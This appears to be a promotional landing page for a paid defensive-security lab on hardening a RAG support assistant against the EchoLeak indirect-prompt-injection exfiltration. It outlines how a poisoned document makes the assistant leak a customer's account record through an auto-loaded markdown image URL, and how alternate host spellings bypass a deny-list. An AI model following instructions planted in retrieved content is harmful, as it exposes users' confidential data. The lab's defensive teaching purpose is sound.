Defend a RAG Assistant: Block Indirect-Injection Exfil (EchoLeak)
Harden the same deliberately-vulnerable RAG assistant the offensive lab broke, in small sequential steps. Stand up the pipeline and trace one benign request, reproduce the EchoLeak markdown-image exfil, then watch a naive deny-list get bypassed by a renamed host. Build the durable fix one mechanism per step: an egress allow-list on the render sink that pins the parsed host (defeating userinfo, IP-encoded, and IPv6 spellings) and covers reference-style images, then provenance isolation so retrieved documents cannot emit instructions. Verify both controls together, resist a userinfo / IP-encoding / paraphrase bypass battery, and pass a final ship gate where attack success rate is 0 and benign quality holds.
Hands-on labs require Pro · $29.99/mo · cancel anytime
What you'll learn
- 1Stand up DV-RAG and trace one benign requestYou own the defense of DV-RAG-Support, ACME Cloud's customer-support
- 2Reproduce the EchoLeak exfil baselineBefore you fix anything, reproduce the leak so you can prove your fix actually
- 3Watch the naive deny-list get bypassedThe on-call engineer saw the alert: an outbound GET to 127.0.0.1. They shipped
- 4Control 1: an egress allow-list on the render sinkTime to build the durable control. It has two mechanisms, and you build them one
- 5Control 2: provenance isolation (treat retrieved content as data)The egress allow-list from Step 4 closes the channel. Now close the source: stop
- 6Verify: exfil blocked, benign image and answers intactBoth mechanisms are now in place and carried forward in dvrag.py: the egress
- 7Resist bypass variantsA control that only stops the one payload you tested is the deny-list mistake all
- 8Ship gate: attack success rate and benign regressionThis is the gate you would run in CI before shipping the fix. It expresses the
Prerequisites
- Comfortable reading and editing Python
- Know what an HTTP GET and a markdown image are
- Helpful to have seen indirect prompt injection first (the offensive counterpart lab)
Exam domains covered
Skills & technologies you'll practice
This advanced-level ai/ml lab gives you real-world reps across:
What you'll harden in this lab
This is a hands-on defensive-security lab built on a real RAG stack: a Milvus vector store, NVIDIA embeddings, and a multi-tenant knowledge base. You defend DV-RAG-Support, the same Retrieval-Augmented Generation (RAG) support assistant the offensive Indirect Prompt Injection lab attacks. You start by reproducing the exploit so you can measure your fix against it: a poisoned document makes the assistant exfiltrate a customer's confidential account record through a markdown-image URL the chat client auto-loads. This is the EchoLeak mechanism (CVE-2025-32711), the first real-world zero-click exploit against a production LLM system, and indirect prompt injection (OWASP LLM01).
Then you do the engineering. You watch an obvious deny-list of the attacker's host get bypassed by another spelling of loopback, which teaches why enumerating bad destinations fails. You replace it with an egress allow-list on the render sink that names the few hosts the client may load and drops everything else, covering both inline and reference-style markdown images. You add context isolation so retrieved documents are treated as untrusted data and account fields are never echoed into a link or image. You finish by verifying a fresh poison battery leaks nothing through any variant while benign account questions still get real, retrieval-grounded answers.